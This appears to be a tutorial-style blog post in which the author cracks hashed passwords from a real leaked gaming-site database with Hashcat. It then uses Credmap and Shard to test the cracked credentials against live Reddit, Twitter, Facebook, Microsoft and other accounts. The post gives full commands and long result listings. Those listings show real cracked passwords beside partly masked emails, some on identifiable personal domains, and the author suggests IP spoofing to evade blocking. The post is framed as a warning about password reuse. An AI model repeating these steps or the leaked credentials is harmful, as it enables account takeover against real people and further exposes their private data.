How to Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit & Microsoft)

Jul 7, 2018 12:23 AM
Jun 1, 2019 07:13 PM
636664945628837270.jpg

Leaked databases get passed around the internet and no one seems to notice. We've become desensitized to the data breaches that occur on a daily basis because it happens so frequently. Join me as I illustrate why reusing passwords across multiple websites is a truly awful practice — and compromise hundreds of social media accounts in the process.

In a recent survey by LastPass, it was disclosed that:

More than 53% of the respondents confessed to not changing their passwords in the past 12 months ... despite news of a data breach involving password compromise.

People simply don't care to better protect their online identities and undervalue their worth to hackers. I became curious to know (realistically) how many online accounts an attacker would be able to compromise from a single data breach, so I began to scour the open internet for leaked databases.

Step 1: Picking the Candidate

When deciding on a breach to investigate, I wanted a recent dataset that would allow for an accurate understanding of how far an attacker can get. I settled on a small gaming website which suffered a data breach in 2017 and had their entire SQL database leaked. To protect the users and their identities, I won't name the website or disclose any of the email addresses found in the leak.

The dataset consisted of roughly 1,100 unique emails, usernames, hashed password, salts, and user IP addresses separated by colons in the following format.

email:username:hashed_password:salt:ip_address

Step 2: Cracking the Hashes

Password hashing is designed to act as a one-way function: an easy-to-perform operation that's difficult for attackers to reverse. It's a type of encryption that turns readable information (plaintext passwords) into scrambled data (hashes). This essentially meant I needed to unhash (crack) the hashed strings to learn each user's password using the infamous hash cracking tool Hashcat.

Created by Jens "atom" Steube, Hashcat is the self-proclaimed fastest and most advanced password recovery utility in the world. Hashcat currently provides support for over 200 highly optimized hashing algorithms like NetNTLMv2, LastPass, WPA/WPA2, and vBulletin, the algorithm used by the gaming dataset I chose. Unlike Aircrack-ng and John the Ripper, Hashcat supports GPU-based password-guessing attacks which are exponentially faster than CPU-based attacks.

Step 3: Putting Brute-Force Attacks into Perspective

Many Null Byte regulars would have likely tried cracking a WPA2 handshake at some point in recent years. To give readers some idea of how much faster GPU-based brute-force attacks are compared to CPU-based attacks, below is an Aircrack-ng benchmark (-S) against WPA2 keys using an Intel i7 CPU found in most modern laptops.

aircrack-ng -S

8560 k/s

That's 8,560 WPA2 password attempts per second. To someone unfamiliar with brute-force attacks, that might seem like a lot. But here's a Hashcat benchmark (-b) against WPA2 hashes (-m 2500) using a basic AMD GPU:

hashcat -b -m 2500

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2500 - WPA/WPA2 (Iterations: 4096)

Speed.Dev.#1.....:   155.6 kH/s (417.48ms) @ Accel:128 Loops:256 Thr:256 Vec:1

The equivalent of 155.6 kH/s is 155,600 password attempts per seconds. Imagine 18 Intel i7 CPUs brute-forcing the same hash simultaneously — that's how fast one GPU can be.

Not all encryption and hashing algorithms provide the same degree of protection. In fact, most provide very poor protection against such brute-force attacks. After discovering the dataset of 1,100 hashed passwords was using vBulletin, a popular forum platform, I ran the Hashcat benchmark again using the corresponding (-m 2711) hashmode:

hashcat -b -m 2711

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2711 - vBulletin >= v3.8.5

Speed.Dev.#1.....:  1949.6 MH/s (274.43ms) @ Accel:128 Loops:512 Thr:256 Vec:1

That's an estimated 1,949,600,000 (~2 billion) password attempts per second. Hopefully, this illustrates just how easy it is for anyone with a modern GPU to crack hashes after a database has leaked.

Step 4: Brute-Forcing the Hashes

There was quite a bit of unnecessary data in the raw SQL dump, like user email and IP addresses. The hashed passwords and salts were filtered out into the following format.

hashed_password:salt

The hashed passwords were then fed into Hashcat using the following command.

hashcat -a 0 -m 2711 ~/leaks/hashes/dataset.hashes ~/wordlists/wordlist.txt -w 4 --potfile-path ~/pots/dataset.potfile

The dictionary attack, or "straight mode," is specified using the -a 0 argument. To improve Hashcat's overall performance, I generally set the -w (or --workload-profile) to 4, to maximize the cracking speed. Finally, the --potfile-path argument was used to save the cracked hashes to the specified file.

After trying dozens of wordlists containing hundreds of millions of passwords against the dataset, I was able to crack roughly 330 (30%) of the 1,100 hashes in less than an hour. Still a bit unsatisfied, I tried more of Hashcat's brute-forcing features:

hashcat -a 3 -m 2711 ~/leaks/hashes/dataset.hashes ?l?l?l?l?l?l?d?d -w 4 --potfile-path ~/pots/dataset.potfile

Here I'm using Hashcat's Mask attack (-a 3) and attempting every possible six-character lowercase (?l) word ending with a two-digit number (?d). This attempt also completed in a relatively short period of time and cracked over 100 more hashes, bringing the total number of cracked hashes to exactly 475, roughly 43% of the 1,100 dataset.

After rejoining the cracked hashes with their corresponding email address, I was left with 475 lines of the following dataset.

******@web.de:Sodium60
******@phaphach.com:Xi@oxiao123
*****@hotmail.nl:rockybalboa
********@gmail.com:ariel420
*******@HOTMAIL.COM:SLOANE01
******@paul198112.plus.com:creative
*******@hotmail.com:67thdtR8nP
******@gmail.com:bullets
*****@terra.com.mx:590416
******@gmail.com:juan930122
*******@aol.de:Madison1990
******@verizon.net:entropy33
*****@gmail.com:flyboy21
*******@gmail.com:rat7
********@jacks.sdstate.edu:entern0w
******@gmail.com:pookieg
******@hotmail.com:kevlar11
*******@myactv.net:1oldman1
******@hotmail.com:dodgers
********@mail.ru:wodI14z2eF
*******@yahoo.de:bella1811
*****@gmail.com:jojo82
*****@hotmail.com:metalfire
*******@gmail.com:nonoobs810
******@gmail.com:bobby10
*******@gmail.com:5Zurt8q8tQ

Step 5: Checking for Password Reuse

As I mentioned, this dataset was leaked from a small, unknown gaming website. Selling these gaming accounts would produce very little value to a hacker. The value is in how often these users reused their username, email, and password across other popular websites.

To figure that out, Credmap and Shard were used to automate the detection of password reuse. These tools are quite similar but I decided to feature both because their findings were different in a few ways which are detailed later in this article.

Option 1: Using Credmap

Credmap is a Python script and requires no dependencies. Simply clone the GitHub repository and change into the credmap/ directory to start using it.

git clone https://github.com/lightos/credmap
cd credmap

The --list argument can be used to view the websites Credmap currently supports.

./credmap.py --list

               . .IIIII             .II
  I123456IIII. I  II  .    II..IIIIIIIIIIIIIIIIIIII
 .  .IIIIII  II             IIIIIIHUNTER2IIIII  I.
    .IIIII.III I        IIIIIIIIIIIIIIIIIIIIIII
   .IILOVEII           II  .IIIII IIIIIIIIIIII. I
    IIIIII             IIII I  IISECRETIIIIIII I
    .II               IIIIIIIIIIIII  IIIIIIIII
       I.           .IIIABC123IIII    I   II  I
         .IIII        IIIIIIIIIIII     .       I
          IIIII.          IIIIII           . I.
          IIGODIII         IIIII             ..I  II .
           IIIIII          IIII...             IIII
            IIII           III. I            IISEXII
            III             I                I  III
            II                                   I   .
             I

credmap v0.1-d862247 (https://github.com/lightos/credmap/)

- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.org
- twitter.com
- amazon.com
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.com
- imgur.com
- foursquare.com
- pinterest.com
- instagram.com
- trakt.tv
- yelp.com
- github.com
- pastebin.com
- facebook.com
- reddit.com
- zoho.com
- vimeo.com

Using the --load argument allows for a "username:password" format. Credmap also supports the "username|email:password" format for websites that only permit logging in with an email address. This can be specified using the --format "u|e:p" argument.

./credmap.py --load ~/leaks/cracked/dataset_user_email_pass_combos.txt --format "u|e:p" --exclude "groupon.com, instagram.com"

During my tests, I found that both Groupon and Instagram blocked or blacklisted my VPS's IP address after a few minutes of using Credmap. This is no doubt a result of dozens of failed attempts in a period of several minutes. I decided to omit (--exclude) these websites, but a motivated attacker may find simple ways of spoofing their IP address on a per password attempt basis and rate-limiting their requests to evade a website's ability to detect password-guessing attacks.

The results of the Credmap command were surprising:

[********:9v6Zyl1heT] on "Bitbucket"...
[********:allus82] on "Reddit"...
[********:Jesus4ever] on "Reddit"...
[********:Jesus4ever] on "Bitbucket"...
[********:s4mb4lb1J] on "Bitbucket"...
[********:xjsv12] on "Bitbucket"...
[********:rosied] on "Bitbucket"...
[********:xbox360] on "Microsoft Live Account"...
[********:seventeen17] on "Bitbucket"...
[********:starwars] on "Scribd"...
[********:Presario123] on "Bitbucket"...
[********:podpod] on "Bitbucket"...
[********:podpod] on "Microsoft Live Account"...
[********:for795] on "Bitbucket"...
[********:isbandia] on "Wikipedia"...
[********:isbandia] on "Bitbucket"...
[********:wtEq5n22aH] on "Scribd"...
[********:240sxse] on "Reddit"...
[********:warhammer40k5] on "Bitbucket"...
[********:abeeagle] on "Reddit"...
[********:99bottles] on "Reddit"...
[********:99bottles] on "Wunderlist"...
[********:99bottles] on "Microsoft Live Account"...
[********:Checkers12] on "Reddit"...
[********:Checkers12] on "Bitbucket"...
[********:morgan13] on "Pinterest"...
[********:greencar.] on "Microsoft Live Account"...
[********:Warzone1] on "Bitbucket"...
[********:o83bjJ1rzQ] on "Bitbucket"...
[********:kajfarik] on "Foursquare"...
[********:kajfarik] on "Bitbucket"...
[********:1324Michael1324] on "Reddit"...
[********:max1mili0n] on "Microsoft Live Account"...
[********:s8elpz7c] on "Microsoft Live Account"...
[********:hitman] on "Reddit"...
[********:u9Q98rtikC] on "Bitbucket"...
[********:ab1g0r] on "Bitbucket"...
[********:stingray951] on "Bitbucket"...
[********:tard] on "Bitbucket"...
[********:Pumpkin007] on "Bitbucket"...
[********:h8802123] on "Reddit"...
[********:ownership1] on "Bitbucket"...
[********:N289wewtzF] on "Bitbucket"...
[********:Hummer1234] on "Bitbucket"...
[********:igniter123] on "Reddit"...
[********:167706] on "Bitbucket"...
[********:12341234] on "Bitbucket"...
[********:sniper] on "Bitbucket"...
[********:1212111] on "Bitbucket"...
[********:element1] on "Bitbucket"...
[********:mrb1087410] on "Bitbucket"...
[********:3k3f6wJxnK] on "Bitbucket"...
[********:spy929] on "Bitbucket"...
[********:qy913zdXpN] on "Bitbucket"...
[********:E5jnhui83D] on "Bitbucket"...
[********:6qfu6oeI8V] on "Bitbucket"...
[********:Nd9nw88grB] on "Scribd"...
[********:REGan181] on "Bitbucket"...
[********:skuli2779] on "Scribd"...
[********:phalanx1] on "Foursquare"...
[********:ariel420] on "Microsoft Live Account"...
[********:SLOANE01] on "Bitbucket"...
[********:67thdtR8nP] on "Scribd"...
[********:bullets] on "Bitbucket"...
[********:flyboy21] on "Wunderlist"...
[********:pookieg] on "Reddit"...
[********:bella1811] on "Reddit"...
[********:jojo82] on "Foursquare"...
[********:nonoobs810] on "Microsoft Live Account"...
[********:maxima1231] on "Reddit"...
[********:maxima1231] on "Pinterest"...
[********:ai7o8Z8vxO] on "Scribd"...
[********:mustang1] on "Reddit"...
[********:M.ustang9939] on "Bitbucket"...
[********:Balingwenwen123] on "Bitbucket"...
[********:dragao] on "Bitbucket"...
[********:7egixeO38Q] on "Scribd"...
[********:astonm] on "Bitbucket"...
[********:Nascar2405] on "Foursquare"...
[********:Nascar2405] on "Microsoft Live Account"...
[********:carrie0530] on "Reddit"...
[********:F85wdvq3kX] on "Bitbucket"...
[********:A2w9taks7L] on "Scribd"...
[********:A2w9taks7L] on "Linkedin"...
[********:Hxopz542] on "Reddit"...
[********:hd070800] on "Pinterest"...
[********:hd070800] on "Bitbucket"...
[********:piper1956] on "Bitbucket"...
[********:123123qweqwe] on "Reddit"...
[********:xboxlive] on "Reddit"...
[********:xboxlive] on "Pinterest"...
[********:Xi%40oxiao123] on "Bitbucket"...
[********:metallica12] on "Bitbucket"...
[********:sianlaser12] on "Pinterest"...
[********:h8ep81knFR] on "Reddit"...
[********:plummer92] on "Reddit"...
[********:plummer92] on "Bitbucket"...
[********:8246jt] on "Reddit"...
[********:8246jt] on "Scribd"...
[********:271bEzxonZ] on "Bitbucket"...
[********:6911747] on "Scribd"...
[********:6911747] on "Bitbucket"...
[********:raejas11] on "Bitbucket"...
[********:d0bb3lts4lt0] on "Microsoft Live Account"...
[********:2yvpdl13CP] on "Scribd"...
[********:dodgers123] on "Bitbucket"...
[********:urbanus] on "Reddit"...
[********:0506571670] on "Foursquare"...
[********:gyqK8Giz1P] on "Bitbucket"...
[********:e6bnvVo67H] on "Bitbucket"...
[********:92k2cizCdP] on "Scribd"...
[********:drnCy43g4O] on "Reddit"...
[********:Ayrtonsenna1] on "Bitbucket"...
[********:aerielle] on "Microsoft Live Account"...
[********:12341234a] on "Reddit"...
[********:6Ibit6qp1F] on "Bitbucket"...
[********:5n6xcd6rPD] on "Scribd"...
[********:5n6xcd6rPD] on "Bitbucket"...
[********:Redalert1] on "Bitbucket"...
[********:2689874] on "Scribd"...
[********:2689874] on "Pinterest"...
[********:bma81092] on "Reddit"...
[********:bma81092] on "Bitbucket"...
[********:csibi2007] on "Reddit"...
[********:alterego] on "Bitbucket"...
[********:tournament] on "Bitbucket"...
[********:Lena2020] on "Pinterest"...
[********:Lena2020] on "Bitbucket"...
[********:alejandro] on "Scribd"...
[********:alejandro] on "Bitbucket"...
[********:Imtr0uble] on "Bitbucket"...
[********:sucette] on "Bitbucket"...
[********:pipQc5p24Q] on "Bitbucket"...
[********:moomoo] on "Pinterest"...
[********:N0t3p%40D%21] on "Scribd"...
[********:N0t3p%40D%21] on "Pinterest"...
[********:7bR9bft8cQ] on "Bitbucket"...
[********:puzzle] on "Bitbucket"...
[********:spartan117] on "Microsoft Live Account"...
[********:scooby1621] on "Microsoft Live Account"...
[********:mike1828] on "Microsoft Live Account"...
[********:fifer123] on "Microsoft Live Account"...
[********:e5Bo1fx3kF] on "Scribd"...
[********:monkey] on "Reddit"...
[********:darkstar] on "Bitbucket"...
[********:irzF9k6p1H] on "Reddit"...
[********:8yu9hkwV9Q] on "Scribd"...
[********:c0mmand] on "Bitbucket"...
[********:doppler] on "Reddit"...
[********:doppler] on "Scribd"...
[********:jh5thrwgefsdfs] on "Bitbucket"...
[********:roblox12] on "Bitbucket"...
[********:aqwzsxedc] on "Bitbucket"...
[********:12345tessi] on "Bitbucket"...
[********:helmond] on "Bitbucket"...
[********:Liam1123] on "Reddit"...
[********:liptoo98] on "Scribd"...
[********:b82olSn4yH] on "Bitbucket"...
[********:bossos2] on "Microsoft Live Account"...
[********:highjump] on "Bitbucket"...
[********:juhu1230] on "Reddit"...
[********:bepolite] on "Reddit"...
[********:M00nglum] on "Microsoft Live Account"...
[********:Adw2u1h3tO] on "Bitbucket"...
[********:Manly123] on "Bitbucket"...
[********:ragnarok01] on "Reddit"...
[********:useless] on "Pinterest"...
[********:starwars97] on "Reddit"...
[********:doodle] on "Bitbucket"...
[********:TYzt2013] on "Bitbucket"...
[********:Cheese77] on "Microsoft Live Account"...
[********:voxpi384] on "Bitbucket"...
[********:allah4life] on "Reddit"...
[********:allah4life] on "Wunderlist"...
[********:Jackal67] on "Reddit"...
[********:Jackal67] on "Bitbucket"...
[********:jasmine00] on "Bitbucket"...
[********:LXfn3BG952] on "Reddit"...
[********:alfiedog12] on "Pinterest"...
[********:25262928] on "Reddit"...
[********:25262928] on "Bitbucket"...
[********:Rat_isthebest] on "Foursquare"...
[********:Rat_isthebest] on "Scribd"...
[********:Rat_isthebest] on "Bitbucket"...
[********:Rat_isthebest] on "Wunderlist"...
[********:4kg83zRltG] on "Scribd"...
[********:4kg83zRltG] on "Bitbucket"...
[********:f1scher] on "Reddit"...
[********:o23jwr8uFD] on "Reddit"...
[********:o23jwr8uFD] on "Bitbucket"...
[********:ikbengek1] on "Pinterest"...
[********:Trustno1%21] on "Bitbucket"...
[********:trudat] on "Bitbucket"...
[********:tototomy] on "Bitbucket"...
[********:qwer1234] on "Bitbucket"...
[********:1391730] on "Foursquare"...
[********:robby123] on "Scribd"...
[********:actsman7] on "Bitbucket"...
[********:whodey] on "Wunderlist"...
[********:308184rt] on "Reddit"...
[********:108Resistance] on "Bitbucket"...
[********:yilin9409] on "Scribd"...
[********:joshuavi] on "Reddit"...
[********:damnkids] on "Bitbucket"...
[********:jbncde5hn6y5] on "Bitbucket"...
[********:roblox12] on "Reddit"...
[********:roblox12] on "Bitbucket"...
[********:azerty00] on "Reddit"...
[********:azerty00] on "Pinterest"...
[********:gymkhana] on "Bitbucket"...
[********:gymkhana] on "Wunderlist"...
[********:newgame] on "Reddit"...
[********:dacheng198] on "Scribd"...
[********:123456] on "Bitbucket"...
[********:syndrom02] on "Reddit"...
[********:Paintball1] on "Bitbucket"...
[********:4536729] on "Bitbucket"...
[********:rawtheme22] on "Reddit"...
[********:rawtheme22] on "Bitbucket"...
[********:sobaked123] on "Microsoft Live Account"...
[********:Thee1234] on "Bitbucket"...
[********:sersna7] on "Bitbucket"...
[********:indonesia2016] on "Scribd"...
[********:indonesia2016] on "Microsoft Live Account"...
[********:Ou6tlgr87N] on "Scribd"...
[********:sea2shell] on "Reddit"...
[********:01cs653] on "Reddit"...
[********:73icJf3ilZ] on "Scribd"...
[********:ndyr761pGO] on "Bitbucket"...
[********:prosk8ter] on "Bitbucket"...
[********:games%21%21%21] on "Pinterest"...
[********:games%21%21%21] on "Microsoft Live Account"...
[********:gt9800] on "Bitbucket"...
[********:mel4tipp] on "Microsoft Live Account"...
[********:mvp123] on "Reddit"...
[********:mvp123] on "Bitbucket"...
[********:3g82tafLbY] on "Bitbucket"...
[********:arturi09] on "Wunderlist"...
[********:arturi09] on "Microsoft Live Account"...
[********:092486] on "Bitbucket"...
[********:sappeps12345] on "Reddit"...
[********:1morerep] on "Bitbucket"...
[********:Finalfantasy89] on "Reddit"...
[********:Finalfantasy89] on "Bitbucket"...
[********:11%3D11bts] on "Scribd"...

All of the usernames were redacted, but we can see 246 Reddit, Microsoft, Foursquare, Wunderlist, and Scribd accounts were reported as having the same exact username:password combinations as the small gaming website dataset.

Option 2: Using Shard

Shard requires Java which may not be present in Kali by default and can be installed using the below command.

sudo apt-get install default-jre

Then, download the latest version of Shard using the wget command.

wget 'https://github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar'

Like with Credmap, the --list argument can be used with Shard to view its supported websites.

java -jar shard-1.5.jar --list

[+] Available modules:
[+]     Facebook
[+]     LinkedIn
[+]     Reddit
[+]     Twitter
[+]     Instagram
[+]     GitHub
[+]     BitBucket
[+]     Kijiji
[+]     DigitalOcean
[+]     Vimeo
[+]     Laposte
[+]     Dailymotion

Using Shard only requires the --file argument to begin detecting password reuse.

java -jar shard-1.5.jar --file ~/leaks/cracked/dataset_user_email_pass_combos.txt

[+] Running in multi-user multi-password mode
[+] Parsed 475 credentials
[+] Running 11 modules
[+] *******@mail.ru:9v6Zyl1heT - Twitter
[+] *******@mail.ru:y2v7nG3oeJ - BitBucket
[+] *******@hotmail.com:5Zurt8q8tQ - BitBucket
[+] *******@yandex.com:gD82guh6iS - BitBucket
[+] *******@hotmail.com:jellybaby - BitBucket
[+] *******@gmail.com:actsman7 - Twitter, BitBucket
[+] *******@gmail.com:eternity1 - BitBucket
[+] *******@gmail.com:joker7 - BitBucket
[+] *******@aol.com:xbox360 - BitBucket
[+] *******@gmail.com:pie110016678 - BitBucket
[+] *******@live.com:roblox12 - BitBucket
[+] *******@gmail.com:andre0 - BitBucket
[+] *******@qq.com:123456 - BitBucket
[+] *******@hotmail.com:hellomotto - BitBucket
[+] *******@outlook.com:cromador - BitBucket
[+] *******@hotmail.co.uk:ibanez92 - Twitter
[+] *******@hotmail.com:Presario123 - Twitter
[+] *******@op.pl:isbandia - BitBucket
[+] *******@gmail.com:240sxse - BitBucket
[+] *******@gmail.com:99bottles - Twitter
[+] *******@gmail.com:Checkers12 - Twitter, BitBucket
[+] *******@yahoo.com:speckles - BitBucket
[+] *******@aol.fr:o83bjJ1rzQ - BitBucket
[+] *******@michaelbodach.com:1324Michael1324 - BitBucket
[+] *******@gmail.com:drhs2012 - Twitter
[+] *******@btinternet.com:max1mili0n - Facebook, BitBucket
[+] *******@gmail.com:s8elpz7c - Twitter
[+] *******@yahoo.com:hitman - Twitter
[+] *******@mail.ru:e6bnvVo67H - BitBucket
[+] *******@gmail.com:ab1g0r - BitBucket
[+] *******@gmail.com:snickers7 - BitBucket
[+] *******@gmail.com:1949qweA - BitBucket
[+] *******@live.se:stingray951 - Twitter, BitBucket
[+] *******@outlook.com:Pumpkin007 - Facebook
[+] *******@yahoo.com:baseball11 - Twitter
[+] *******@hotmail.com:h8802123 - BitBucket
[+] *******@mail.ru:i7q8c8jDkW - BitBucket
[+] *******@gmail.com:Hummer1234 - BitBucket
[+] *******@hotmail.com:50killer - BitBucket, Kijiji
[+] *******@gmail.com:igniter123 - BitBucket
[+] *******@hotmail.se:joker123 - BitBucket
[+] *******@gmail.com:orlando.12 - BitBucket
[+] *******@gmail.com:167706 - Twitter
[+] *******@hotmail.com:pssp643056 - Twitter
[+] *******@gmail.com:tacotico - Twitter, BitBucket
[+] *******@Hotmail.com:12341234 - Twitter
[+] *******@comcast.net:1212111 - BitBucket
[+] *******@mail.ru:2hg5hd4uEE - BitBucket
[+] *******@yahoo.com:element1 - BitBucket
[+] *******@msn.com:trooper71 - Facebook, Twitter
[+] *******@gmail.com:Mustang7991 - BitBucket
[+] *******@gmail.com:fuckthat - BitBucket
[+] *******@gmail.com:qy913zdXpN - BitBucket
[+] *******@hotmail.com:vdz3888 - BitBucket
[+] *******@rogers.com:maplew00d - Facebook
[+] *******@hotmail.com:Nd9nw88grB - BitBucket
[+] *******@msn.com:1234567890 - BitBucket
[+] *******@yahoo.com:p00p00p00 - Twitter, BitBucket
[+] *******@HOTMAIL.COM:SLOANE01 - BitBucket
[+] *******@paul198112.plus.com:creative - BitBucket
[+] *******@terra.com.mx:590416 - BitBucket
[+] *******@gmail.com:juan930122 - Facebook, Twitter, BitBucket
[+] *******@aol.de:Madison1990 - BitBucket
[+] *******@verizon.net:entropy33 - BitBucket
[+] *******@gmail.com:rat7 - BitBucket
[+] *******@jacks.sdstate.edu:entern0w - BitBucket
[+] *******@hotmail.com:kevlar11 - BitBucket
[+] *******@hotmail.com:dodgers - BitBucket
[+] *******@mail.ru:wodI14z2eF - BitBucket
[+] *******@gmail.com:jojo82 - BitBucket
[+] *******@gmail.com:maxima1231 - Facebook, BitBucket
[+] *******@yahoo.com:mustang1 - BitBucket
[+] *******@gmail.com:M.ustang9939 - Twitter, BitBucket
[+] *******@gmail.com:ROFLMAO - BitBucket
[+] *******@gmail.com:qwerty - BitBucket
[+] *******@gmail.com:skatebrd1 - Twitter
[+] *******@gmail.com:carrie0530 - BitBucket
[+] *******@gmail.com:Hxopz542 - Twitter, BitBucket
[+] *******@gmail.com:hd070800 - Facebook
[+] *******@yahoo.com:xboxlive - BitBucket
[+] *******@gmail.com:sianlaser12 - BitBucket
[+] *******@live.co.uk:newworldorder11 - Facebook, Twitter
[+] *******@mail.ru:t57yuuD2nH - BitBucket
[+] *******@mail.ru:h8ep81knFR - Twitter, BitBucket
[+] *******@msn.com:Legion01 - Twitter
[+] *******@gmail.com:Vapor1948 - BitBucket
[+] *******@hotmail.com:Kerri14 - BitBucket
[+] *******@mail.ru:271bEzxonZ - BitBucket
[+] *******@gmail.com:raejas11 - Twitter
[+] *******@hotmail.com:2yvpdl13CP - BitBucket
[+] *******@mail.ru:x52Wugvl3D - BitBucket
[+] *******@hotmail.com:bcd234 - BitBucket
[+] *******@hotmail.com:dodgers123 - BitBucket
[+] *******@centurylink.net:zaq11qaz - BitBucket
[+] *******@hotmail.com:stumpy69 - BitBucket
[+] *******@gmail.com:0506571670 - Twitter, BitBucket
[+] *******@ewjc.com:fr33ze - BitBucket
[+] *******@gmail.com:gyqK8Giz1P - BitBucket
[+] *******@gmail.com:abc12345 - BitBucket
[+] *******@hotmail.com:92k2cizCdP - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@yandex.com:drnCy43g4O - Twitter
[+] *******@gmail.com:makocole1 - Twitter, Kijiji
[+] *******@gmail.com:Ayrtonsenna1 - Facebook
[+] *******@gmail.com:sixsixsix - BitBucket
[+] *******@aol.com:aerielle - BitBucket
[+] *******@yahoo.com:12341234a - Twitter
[+] *******@gmail.com:6Ibit6qp1F - BitBucket
[+] *******@gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] *******@gmail.com:bma81092 - Twitter, BitBucket
[+] *******@hotmail.com:tournament - BitBucket
[+] *******@hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] *******@yahoo.com:600543jp - BitBucket
[+] *******@blueyonder.co.uk:simpkins - BitBucket
[+] *******@gmail.com:linkin2632 - Twitter
[+] *******@yahoo.com:c572889 - Twitter
[+] *******@yahoo.com.mx:alejandro - BitBucket
[+] *******@gmail.com:conconab - BitBucket
[+] *******@free.fr:sucette - BitBucket
[+] *******@hotmail.com:pipQc5p24Q - BitBucket
[+] *******@h4milton.com:pepper10 - BitBucket
[+] *******@gmail.com:Cheese24 - BitBucket
[+] *******@gmail.com:willow76! - Facebook, Kijiji
[+] *******@live.ca:shawn2000 - Twitter, BitBucket
[+] *******@gmail.com:spartan117 - Twitter, BitBucket
[+] *******@hotmail.com:fifa2007 - Twitter
[+] *******@yahoo.com:mike1828 - BitBucket
[+] *******@live.com:Bounce989 - Twitter, BitBucket
[+] *******@gmail.com:13241324 - Twitter
[+] *******@mail.ru:e5Bo1fx3kF - BitBucket
[+] *******@mail.ru:1doc2H5wxZ - BitBucket
[+] *******@mail.ru:irzF9k6p1H - Twitter
[+] *******@gmail.com:roblox12 - Facebook, Twitter
[+] *******@hotmail.com:helmond - BitBucket
[+] *******@gmail.com:Liam1123 - BitBucket
[+] *******@yahoo.com:be6315se - Twitter
[+] *******@hotmail.com:r1s2d3nt - BitBucket
[+] *******@hotmail.com:rock18 - BitBucket
[+] *******@gmail.com:bossos2 - BitBucket
[+] *******@gmail.com:highjump - BitBucket
[+] *******@googlemail.com:juhu1230 - BitBucket
[+] *******@charter.net:amanda11 - BitBucket
[+] *******@gmail.com:Adw2u1h3tO - BitBucket
[+] *******@hotmail.com:ragnarok01 - Twitter
[+] *******@hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] *******@gmail.com:Games123 - Twitter
[+] *******@hotmail.com:good4u - Kijiji
[+] *******@hotmail.com:2211 - BitBucket
[+] *******@gmail.com:starwars97 - BitBucket
[+] *******@aol.com:hardass - BitBucket
[+] *******@gmail.com:scarface - BitBucket
[+] *******@t-online.de:143ABC1 - BitBucket
[+] *******@gmail.com:weswee234 - Twitter
[+] *******@hotmail.com:javiermago1 - BitBucket
[+] *******@yahoo.com:w1a2y3n4e5 - BitBucket
[+] *******@gmail.com:608881e - Kijiji
[+] *******@yahoo.com:074langley - BitBucket
[+] *******@hotmail.com:bosspimp - Facebook, Twitter
[+] *******@gmail.com:Driftking1 - Twitter
[+] *******@hotmail.com:voxpi384 - BitBucket
[+] *******@gmail.com:allah4life - BitBucket
[+] *******@comcast.net:Jackal67 - BitBucket
[+] *******@hotmail.com:jasmine00 - Facebook, BitBucket
[+] *******@gmail.com:10241966 - BitBucket
[+] *******@gmail.com:alfiedog12 - BitBucket
[+] *******@gmail.com:0olivia1 - BitBucket
[+] *******@gmail.com:Rat_isthebest - Kijiji
[+] *******@web.de:scoop - BitBucket
[+] *******@hotmail.com:ikbengek1 - Twitter, BitBucket
[+] *******@allansmith.net:ras04cal - Twitter
[+] *******@419.e90.biz:b82olSn4yH - BitBucket
[+] *******@hotmail.com:tototomy - Twitter
[+] *******@gmail.com:2211 - BitBucket
[+] *******@qq.com:1391730 - Twitter
[+] *******@gmail.com:robby123 - BitBucket
[+] *******@gmail.com:Logitech123 - BitBucket
[+] *******@yahoo.com:darkstar3509 - BitBucket
[+] *******@gmail.com:whodey - BitBucket
[+] *******@uhd.net.ua:h55gr5sKdQ - BitBucket
[+] *******@gmail.com:roblox12 - BitBucket
[+] *******@gmail.com:12345Brandon - BitBucket
[+] *******@gmail.com:Banan123 - BitBucket
[+] *******@gmail.com:joshuavi - Kijiji
[+] *******@cox.net:damnkids - BitBucket
[+] *******@hotmail.com:1kolort2 - BitBucket
[+] *******@live.com:roblox12 - Twitter, BitBucket
[+] *******@gmail.com:azerty00 - Twitter
[+] *******@gmail.com:apache7076 - Twitter
[+] *******@inmyd.ru:2wbJx11zaW - BitBucket
[+] *******@aim.com:thisisme - BitBucket
[+] *******@gmail.com:dacheng198 - BitBucket
[+] *******@GMAIL.COM:BASSETT92 - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@hotmail.com:syndrom02 - Twitter, BitBucket
[+] *******@gmail.com:bronco999 - BitBucket
[+] *******@hotmail.com:metallica4224 - Twitter
[+] *******@gmail.com:rawtheme22 - Twitter
[+] *******@gmail.com:sobaked123 - BitBucket
[+] *******@gmail.com:Thee1234 - BitBucket
[+] *******@hotmail.ca:0230176 - BitBucket
[+] *******@gmail.com:19722791 - BitBucket
[+] *******@gmail.com:indonesia2016 - BitBucket
[+] *******@live.co.uk:01cs653 - Facebook, BitBucket
[+] *******@gmail.com:Battlefield710 - Twitter, BitBucket
[+] *******@gmail.com:Supaman1 - Facebook
[+] *******@hotmail.com:Bigdick*12 - BitBucket
[+] *******@outlook.com:darkstar1 - BitBucket
[+] *******@web.de:gt9800 - BitBucket
[+] *******@yahoo.com:mvp123 - Twitter
[+] *******@yahoo.com:arturi09 - BitBucket
[+] *******@gmail.com:092486 - BitBucket
[+] *******@hotmail.com:sappeps12345 - BitBucket
[+] *******@yahoo.com:1morerep - Twitter, BitBucket
[+] *******@cox.net:joiedevivre - BitBucket
[+] *******@gmail.com:23vec4rPcC - BitBucket

After running the Shard command, a total of 219 Twitter, Facebook, BitBucket, and Kijiji accounts were reported as using the same exact username:password combinations. Interestingly, there were no Reddit detections this time.

The Shard results determined that 166 BitBucket accounts were compromised using this password-reuse attack, which is inconsistent with Credmap's BitBucket detection of 111 accounts. Both Crepmap and Shard haven't been updated since 2016 and I suspect the BitBucket results are mostly (if not entirely) false positives. It's possible BitBucket has altered their login parameters since 2016 and has thrown off Credmap and Shard's ability to detect a verified login attempt.

Motivated Hackers Can Crack Even More Passwords

